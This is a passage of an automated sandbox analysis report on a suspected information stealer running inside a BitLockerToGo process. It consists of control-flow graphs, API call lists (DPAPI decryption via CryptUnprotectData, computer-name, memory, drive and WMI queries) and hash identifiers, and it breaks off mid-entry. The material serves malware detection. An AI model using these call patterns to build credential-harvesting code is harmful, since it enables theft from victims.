                                                                                • 3, xrefs: 00ADDF9B
                                                                                • runtime: netpoll: PostQueuedCompletionStatus failedx509: certificate has expired or is not yet valid: ConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWFileAlignment larger than 0x200 and not a power of 2` , xrefs: 00ADDF92
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS$3$runtime: netpoll: PostQueuedCompletionStatus failed (errno= abiRegArgsType needs GC Prog, update methodValueCallFrameObjsoffset parameter must be a multiple of the system's page sizex509: failed to parse URI constraint %q: cannot be IP addressx509: internal er$runtime: netpoll: PostQueuedCompletionStatus failedx509: certificate has expired or is not yet valid: ConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWFileAlignment larger than 0x200 and not a power of 2`
                                                                                • API String ID: 0-736920523
                                                                                • Opcode ID: 8b5b4126673c314f8c09c05a6d890812da4a42dbe44a5286481664918e450b95
                                                                                • Instruction ID: 7ffd5afb09fea0a5eb01cd26ff862fb54d104ff7168f15e8fe8157afb78397e4
                                                                                • Opcode Fuzzy Hash: 8b5b4126673c314f8c09c05a6d890812da4a42dbe44a5286481664918e450b95
                                                                                • Instruction Fuzzy Hash: 212114B4408B418FD300FF65D19572EBBE4AF88348F80885DE4898B392D7B99948CB63
                                                                                Strings
                                                                                • write of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi, xrefs: 00AB3DEC
                                                                                • $, xrefs: 00AB3E53
                                                                                • Go pointer stored into non-Go memoryIA5String contains invalid characterPower PC with floating point supportThunk Address Of Data too spread outUnable to determine system directoryaccessing a corrupted shared librarybytes.Reader.ReadAt: negative offsetbytes.Re, xrefs: 00AB3E4A
                                                                                • to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWe, xrefs: 00AB3E16
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWe$$$Go pointer stored into non-Go memoryIA5String contains invalid characterPower PC with floating point supportThunk Address Of Data too spread outUnable to determine system directoryaccessing a corrupted shared librarybytes.Reader.ReadAt: negative offsetbytes.Re$write of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi
                                                                                • API String ID: 0-842866254
                                                                                • Opcode ID: 9ab770772740cbfd8028ebaa834b217d0c44f490412cb4e4f4270ee67f4b2432
                                                                                • Instruction ID: eaf8f0538d866d8c949bcd306d44175a805bd025ab186b3f56345c55c0fdcd98
                                                                                • Opcode Fuzzy Hash: 9ab770772740cbfd8028ebaa834b217d0c44f490412cb4e4f4270ee67f4b2432
                                                                                • Instruction Fuzzy Hash: F701D7B4808B459FC700FF65E29575EBBE5FF44308F908D2DE4888B252D7749844DB62

                                                                                Execution Graph

                                                                                Execution Coverage:8.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:20.4%
                                                                                Total number of Nodes:378
                                                                                Total number of Limit Nodes:28

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
                                                                                • SysAllocString.OLEAUT32(k2`0), ref: 00438B60
                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
                                                                                • SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
                                                                                • SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
                                                                                • VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
                                                                                • VariantClear.OLEAUT32(?), ref: 00438E8F
                                                                                • SysFreeString.OLEAUT32(?), ref: 00438EB3
                                                                                • SysFreeString.OLEAUT32(?), ref: 00438EB9
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00438EC6
                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                • String ID: ,./,$0NuNup=Nu$S$]E$]E$b>c<$k2`0$x;
                                                                                • API String ID: 2573436264-1088545154
                                                                                • Opcode ID: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                • Instruction ID: 6e5b62aa8b1ec0da306810ad309870e49cdd1aa0d64757ab7dc6e3fbd6c770b3
                                                                                • Opcode Fuzzy Hash: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                • Instruction Fuzzy Hash: 3122EFB66083419BD310CF28C885B6BBBE5EFC9314F14892DF595DB2A0DB79D805CB86

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 84 419362-419374 85 419380-4193bb 84->85 85->85 86 4193bd-4193c5 85->86 87 4193c7-4193d6 86->87 88 41940a-419465 call 401a50 86->88 89 4193e0-4193e7 87->89 96 419470-4194d2 88->96 91 4193f0-4193f6 89->91 92 4193e9-4193ec 89->92 91->88 95 4193f8-419407 call 43d910 91->95 92->89 94 4193ee 92->94 94->88 95->88 96->96 97 4194d4-4194fb call 401d90 96->97 102 419502-41956f 97->102 103 4195f2-4195f4 97->103 104 41933a 97->104 105 419570-4195c7 102->105 106 419600-419606 103->106 109 419340-419349 call 407ee0 104->109 105->105 107 4195c9-4195eb call 401d90 105->107 106->106 108 419608-41963e 106->108 107->102 107->103 107->109 119 419360 107->119 120 41934c-419351 107->120 112 419640-419643 108->112 113 419645-419648 108->113 109->120 112->113 116 41964a 112->116 117 41964c-419658 113->117 116->117 121 41965a-41965d 117->121 122 41965f 117->122 119->119 120->119 121->122 123 419660-41967e call 407ed0 121->123 122->123 126 419795-4197f4 call 43f450 CryptUnprotectData 123->126 127 419684-41968b 123->127 126->102 126->103 128 4196b2-4196fc call 41d140 * 2 127->128 135 4196a0-4196ac 128->135 136 4196fe-419719 call 41d140 128->136 135->126 135->128 136->135 139 41971b-419743 136->139 140 419691-419695 139->140 141 419749-41975f call 41d140 139->141 140->135 144 419765-419790 141->144 145 41968d 141->145 144->135 145->140
                                                                                APIs
                                                                                  • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: CryptDataInitializeThunkUnprotect
                                                                                • String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
                                                                                • API String ID: 279577407-4262920783
                                                                                • Opcode ID: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                • Instruction ID: e77fc135ad70ed6736d1295220b367ee2e65166797322382e6457787232dfc05
                                                                                • Opcode Fuzzy Hash: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                • Instruction Fuzzy Hash: C3C109B2A083418BD728CF28C8A17AFB7E2AFD5304F19893DD49987351DB389C45CB46

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph starting at node 272 (4229cd-4229d9); node and edge list omitted. API calls named in the graph: RtlExpandEnvironmentStrings, GetLogicalDrives
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "0B$7x~$`*B
                                                                                • API String ID: 0-767839351
                                                                                • Opcode ID: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                • Instruction ID: 9fd70d4789ae2a743fdbd81f1d1a9eea778115e9b5f68926e692af45083946f2
                                                                                • Opcode Fuzzy Hash: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                • Instruction Fuzzy Hash: B4726576A08211CFD714CF68EC817AAB7B2FF89314F09897CE945AB391D7389901CB95

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 421 432fe0-4330cc GetSystemMetrics * 2 427 4330d3-43334a 421->427
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID: $)6C$C7C$Y8C
                                                                                • API String ID: 4116985748-1654261340
                                                                                • Opcode ID: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                • Instruction ID: 4b006a6d5d8b16d53f58adea831d835725ce84f357d2a915258799e4b83f44bd
                                                                                • Opcode Fuzzy Hash: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                • Instruction Fuzzy Hash: 5E817CB45193808FE360DF25C58879EBBE0BB85348F508D2EE4D88B350DBB89549CF5A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 474 408640-408651 call 43d0a0 477 4088e6-4088e8 ExitProcess 474->477 478 408657-40865e call 4354a0 474->478 481 4088e1 call 43d860 478->481 482 408664-40868a GetCurrentProcessId GetCurrentThreadId 478->482 481->477 483 408690-40876a SHGetSpecialFolderPathW 482->483 484 40868c-40868e 482->484 486 408770-40878c 483->486 484->483 486->486 487 40878e-4087bf call 43bc90 486->487 490 4087c0-4087dc 487->490 491 4087f6-40880b GetForegroundWindow 490->491 492 4087de-4087f4 490->492 493 408811-408832 491->493 494 4088ab-4088c3 call 4099e0 491->494 492->490 495 408834-408836 493->495 496 408838-4088a9 493->496 499 4088c5 call 40c660 494->499 500 4088cf-4088d6 494->500 495->496 496->494 503 4088ca call 40b4c0 499->503 500->481 502 4088d8-4088de call 407ee0 500->502 502->481 503->500
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00408664
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040866E
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040874C
                                                                                • GetForegroundWindow.USER32 ref: 00408803
                                                                                • ExitProcess.KERNEL32 ref: 004088E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                • String ID:
                                                                                • API String ID: 4063528623-0
                                                                                • Opcode ID: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                • Instruction ID: cffc6beeb204386c5c3c11e80dbd3dd055112d37bec62ae1e5896589e5666a59
                                                                                • Opcode Fuzzy Hash: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                • Instruction Fuzzy Hash: 0F613977B447084BD718AFA9CD8635AB6D29B84710F0E813DA594DB3D2ED7CDC009789

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 585 42be8a-42bea6 586 42beb0-42bf05 585->586 586->586 587 42bf07-42bf0e 586->587 588 42c284 587->588 589 42bf14-42bf1b 587->589 591 42c287-42c2a5 588->591 590 42bf20-42bf29 589->590 590->590 592 42bf2b 590->592 594 42c2b0-42c2dd 591->594 592->591 594->594 595 42c2df-42c2e6 594->595 596 42c2fb-42c307 595->596 597 42c2e8-42c2ef 595->597 598 42c321-42c348 call 43f450 596->598 599 42c309-42c30b 596->599 600 42c2f0-42c2f9 597->600 604 42c34d-42c38f GetPhysicallyInstalledSystemMemory 598->604 601 42c310-42c31d 599->601 600->596 600->600 601->601 603 42c31f 601->603 603->598 605 42c390-42c3e9 604->605 605->605 606 42c3eb-42c429 call 41dc90 605->606 609 42c430-42c471 606->609 609->609 610 42c473-42c47a 609->610 611 42c47c-42c483 610->611 612 42c49d 610->612 613 42c490-42c499 611->613 614 42c4a0-42c4aa 612->614 613->613 617 42c49b 613->617 615 42c4ac-42c4af 614->615 616 42c4bd 614->616 618 42c4b0-42c4b9 615->618 619 42c4bf-42c4ce 616->619 617->614 618->618 620 42c4bb 618->620 621 42c4d0-42c4d7 619->621 622 42c4eb-42c53a 619->622 620->619 623 42c4e0-42c4e9 621->623 624 42c540-42c55e 622->624 623->622 623->623 624->624 625 42c560-42c567 624->625 626 42c57b-42c588 625->626 627 42c569-42c56f 625->627 629 42c58a-42c591 626->629 630 42c5ab-42c661 626->630 628 42c570-42c579 627->628 628->626 628->628 631 42c5a0-42c5a9 629->631 632 42c662 630->632 631->630 631->631 632->632
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: BVAI
                                                                                • API String ID: 3960555810-2651495128
                                                                                • Opcode ID: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                • Instruction ID: ce2e31214bed253c0b38068d6f273c2badb2212a27c3daf9020c2c42f253850c
                                                                                • Opcode Fuzzy Hash: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                • Instruction Fuzzy Hash: 66C1373160C3908BC725CF2994903AFBFE1AF9A304F5849AED4C9D7352D7798806CB5A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 637 42c26c-42c2a5 call 4327d0 call 407ee0 643 42c2b0-42c2dd 637->643 643->643 644 42c2df-42c2e6 643->644 645 42c2fb-42c307 644->645 646 42c2e8-42c2ef 644->646 647 42c321-42c348 call 43f450 645->647 648 42c309-42c30b 645->648 649 42c2f0-42c2f9 646->649 653 42c34d-42c38f GetPhysicallyInstalledSystemMemory 647->653 650 42c310-42c31d 648->650 649->645 649->649 650->650 652 42c31f 650->652 652->647 654 42c390-42c3e9 653->654 654->654 655 42c3eb-42c429 call 41dc90 654->655 658 42c430-42c471 655->658 658->658 659 42c473-42c47a 658->659 660 42c47c-42c483 659->660 661 42c49d 659->661 662 42c490-42c499 660->662 663 42c4a0-42c4aa 661->663 662->662 666 42c49b 662->666 664 42c4ac-42c4af 663->664 665 42c4bd 663->665 667 42c4b0-42c4b9 664->667 668 42c4bf-42c4ce 665->668 666->663 667->667 669 42c4bb 667->669 670 42c4d0-42c4d7 668->670 671 42c4eb-42c53a 668->671 669->668 672 42c4e0-42c4e9 670->672 673 42c540-42c55e 671->673 672->671 672->672 673->673 674 42c560-42c567 673->674 675 42c57b-42c588 674->675 676 42c569-42c56f 674->676 678 42c58a-42c591 675->678 679 42c5ab-42c661 675->679 677 42c570-42c579 676->677 677->675 677->677 680 42c5a0-42c5a9 678->680 681 42c662 679->681 680->679 680->680 681->681
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: BVAI
                                                                                • API String ID: 3960555810-2651495128
                                                                                • Opcode ID: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                • Instruction ID: 4ac38620278a99acf54b81f63bd20ff9ec3c0600e4476075f1787c1a2961d72f
                                                                                • Opcode Fuzzy Hash: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                • Instruction Fuzzy Hash: 9FA1397160C3908BC725CF2994903EFBBE1AF9B304F58496ED4C997342D7798906CB5A
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: BVAI
                                                                                • API String ID: 3960555810-2651495128
                                                                                • Opcode ID: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                • Instruction ID: b3ae04337b81b82226eeb8f92f7c3334391f9750b5f809a1d1c02d35e42eb35b
                                                                                • Opcode Fuzzy Hash: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                • Instruction Fuzzy Hash: E6A1377160C3908BC7258F2994903EFBFE1AF9A304F58496ED4C997352D7798806CB5A
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 530 42b842-42b84c 531 42b86b-42b8b6 FreeLibrary call 43f450 530->531 532 42b84e-42b855 530->532 538 42b8c0-42b8e5 531->538 534 42b860-42b869 532->534 534->531 534->534 538->538 539 42b8e7-42b8f1 538->539 540 42b8f3-42b8fa 539->540 541 42b90b-42b942 GetComputerNameExA 539->541 542 42b900-42b909 540->542 543 42b946 541->543 542->541 542->542 543->543
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerFreeLibraryName
                                                                                • String ID: KHGN
                                                                                • API String ID: 2904949787-1032087821
                                                                                • Opcode ID: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                • Instruction ID: 6cc2bcf1cdf43af400e598cc500c9cf08bcf6da0c1c09473a882a53858423e11
                                                                                • Opcode Fuzzy Hash: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                • Instruction Fuzzy Hash: 3021D17014C2858EDB218F35A860BFB7FE4DB9B344F58486ED0C9C3292CB39444A9B56

                                                                                Control-flow Graph

                                                                                control_flow_graph 544 42b840-42b8b6 FreeLibrary call 43f450 549 42b8c0-42b8e5 544->549 549->549 550 42b8e7-42b8f1 549->550 551 42b8f3-42b8fa 550->551 552 42b90b-42b942 GetComputerNameExA 550->552 553 42b900-42b909 551->553 554 42b946 552->554 553->552 553->553 554->554
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerFreeLibraryName
                                                                                • String ID: KHGN
                                                                                • API String ID: 2904949787-1032087821
                                                                                • Opcode ID: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                • Instruction ID: 50f42b0a951807a88e86a22aae57dbd367c2f88d39f0ae760fbcdf6f8fc845ea
                                                                                • Opcode Fuzzy Hash: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                • Instruction Fuzzy Hash: 001123B01482858FD7219F35E860BEB7FE4EB9B344F54482DD0C9C3251CB39484A9B92
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID: bC
                                                                                • API String ID: 3545744682-4190571504
                                                                                • Opcode ID: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                • Instruction ID: e82d825c06ad02e345faf7a0e59537a249da3b56fbe03ec142442aa4babbea04
                                                                                • Opcode Fuzzy Hash: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                • Instruction Fuzzy Hash: 5421053560D3E18BD7358F2594943FABBE1EF92300F59885EC8CA9B341CA794409CB96
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID: bC
                                                                                • API String ID: 3545744682-4190571504
                                                                                • Opcode ID: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                • Instruction ID: 8a9ff360a492162640ec0ee52e10ad36b0c35468f5dd3550f358dda6bb680e87
                                                                                • Opcode Fuzzy Hash: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                • Instruction Fuzzy Hash: 6B21257660D3A0CBD734CF2094843BAB7E2EFC6300F55895EC8CA9B340CA745806CB96
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID: KHGN
                                                                                • API String ID: 3545744682-1032087821
                                                                                • Opcode ID: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                • Instruction ID: 800fda513f984b05936c8cd62631b8339e5399499a0172a9c9d32c48e16ec2f1
                                                                                • Opcode Fuzzy Hash: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                • Instruction Fuzzy Hash: 4F1129B41483858FD7219F35A8A0BFB7FE4DB9B344F54482DD0C9C3241CB39444A9B92
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 00409E1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                • Instruction ID: 794dd10beed9ab1fdd81d0f6796807d90850f10cc366af128ac51e95daa83683
                                                                                • Opcode Fuzzy Hash: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                • Instruction Fuzzy Hash: C3110879A842508FC7188F25D8816A97FF1FB55325B19D0ADD491EB363C23CD846CB58
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
                                                                                • Instruction ID: 0f926294dc6f60f2445246b0eb10c1f08d66fb03fcf9e8185527a5568484abe7
                                                                                • Opcode Fuzzy Hash: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
                                                                                • Instruction Fuzzy Hash: 3AF0F075518302EFD7242F29BC49B17367CEF8B306F04183AF50191062DB35EC059769
                                                                                APIs
                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 00436831
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultLanguageUser
                                                                                • String ID:
                                                                                • API String ID: 95929093-0
                                                                                • Opcode ID: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                • Instruction ID: c1e6da90ff38b23c1098b9489220249bba1124fa0f23aac35cb26dcf4f2101a0
